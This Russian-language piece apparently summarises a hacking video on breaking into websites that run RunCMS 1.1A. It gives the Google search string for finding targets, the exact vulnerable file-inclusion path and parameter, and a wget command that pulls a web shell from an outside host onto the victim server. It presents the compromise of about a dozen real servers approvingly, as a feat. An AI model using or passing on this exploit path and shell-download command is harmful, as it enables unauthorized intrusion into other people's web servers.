В этом коротеньком и простом видео взломщик покажет, как ему удалось получить довольно приличное число шеллов с помощью бронебойного бага в RunCMS. Последняя, замечу, является довольно известной и раскрученной CMS-системой в интернете.
Для начала используется классический поиск через google.com. Для этого в запрос вбивается следующая строка: Powered by RunCMS 1.1A. Поисковик выдаст достаточно ссылок для пробы бага на практике. Выбрав сайт, хакер подставляет к адресу строчку /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=. Это и есть скрипт, подверженный инклуду. На другой сайт взломщик заливает простенький скрипт-шелл и подставляет ссылку на него в параметры уязвимого скрипта. Теперь адрес принимает вид www.sayt.ru/modules/newbb_plus/class/forumpollrende...gif?&cmd=id. После того как запрос отправлен, браузер радужно сообщает хакеру его права в системе (т.е. выполняет команду id). Далее наш герой выясняет,
какие из качалок установлены на сервере, и попутно просматривает листинг файлов. Оказалось, что на сервере установлен wget. Это то, что надо: теперь командой wget -o shel.php http://k3r.narod.ru/shell.php хакер заливает на хост полноценный шелл. Подобным образом нашему взломщику удалось получить доступ еще над десятком веб-серверов. Администраторы этих сайтов оказались не совсем олухами и вскоре позакрывали дыры, либо вообще удалили уязвимый скрипт. И правильно сделали.